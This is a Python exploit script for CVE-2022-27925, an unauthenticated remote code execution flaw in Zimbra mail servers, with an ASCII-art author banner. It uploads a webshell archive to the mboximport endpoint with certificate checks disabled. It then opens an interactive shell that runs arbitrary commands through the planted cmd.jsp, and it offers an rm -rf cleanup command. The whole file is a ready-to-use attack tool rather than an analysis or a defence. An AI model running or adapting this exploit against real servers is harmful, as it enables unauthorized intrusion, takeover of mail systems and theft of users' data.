CVE-2022-27925.py

import requests
import sys
import re
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

endpoints = ["/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd",
             "/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1"]


headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded'
}


artwork = '''
              .,-:;//;:=,
          . :H@@@MM@M#H/.,+%;,
       ,/X+ +M@@M@MM%=,-%HMMM@X/,
     -+@MM; $M@@MH+-,;XMMMM@MMMM@+-
    ;@M@@M- XM@X;. -+XXXXXHHH@M@M#@/.
  ,%MM@@MH ,@%=             .---=-=:=,.
  =@#@@@MX.,                -%HX$$%%%:;
 =-./@M@M$                   .;@MMMM@MM:
 X@/ -$MM/    Developed by:    . +MM@@@M$
,@M@H: :@:   Mohamed Benchikh  . =X#@@@@-
,@@@MMX, .  (@mohamedbenchikh)  /H- ;@M@M=
.H@@@@M@+,                      %MM+..%#$.
 /MMMM@MMH/.                   XM@MH; =;
  /%+%$XHH@$=               , .H@@@@MX,
   .=--------.           -%H.,@@@@@MX,
   .%MM@@@HHHXX$$$%+- .:$MMX =M@@MM%.
     =XMMM@MM@MM#H;,-+HMM@M+ /MMMX=
       =%@M@M#@$-.=$@MM@@@M; %M%=
         ,:+$+-,/H#MMMMMMM@= =,
               =++%%%%+/:-.
        
Zimbra Unauthenticated Remote Code Execution Exploit (CVE-2022-27925)
Use at your own risk!
'''


msg = """
Exploit was successful!

Send "exit" to exit the shell
Send "deleteme" to delete the shell
"""

def exploit(url, endpoint):
    with open("webshell.zip", 'rb') as payload:

        try:
            req = requests.post(url + endpoint, timeout=60, data=payload,
                                verify=False, headers=headers)

            if req.status_code == 401:
                check_req = requests.get(url + "/zimbraAdmin/cmd.jsp")
                if check_req.status_code == 200:
                    print(msg)
                    while True:
                        command = input("> ")
                        if command == "exit":
                            break
                        if command == "deleteme":
                            requests.get(url + "/zimbraAdmin/cmd.jsp?cmd=rm -rf /opt/zimbra/jetty/webapps/zimbraAdmin/cmd.jsp")
                            break
                        req = requests.get(url + "/zimbraAdmin/cmd.jsp?cmd=" + command,
                                           verify=False, headers=headers)
                        try:
                            print(req.text.split('<BR>')[
                                  1].split('</pre>')[0].strip())
                        except:
                            print("Command failed to execute")

                    return True

        except Exception as e:
            print(e)


def main():

    print(artwork)

    if len(sys.argv) < 2:
        print("python CVE-2022-27925.py https://mail.target.com")
        sys.exit(0)

    url = sys.argv[1]

    if url.endswith("/"):
        url = url[:-1]

    if "://" not in url:
        url = 'https://' + url

    flag = False

    for endpoint in endpoints:
        flag = exploit(url, endpoint)
        if flag:
            break

    if not flag:
        print("Exploit failed!")


if __name__ == '__main__':
    main()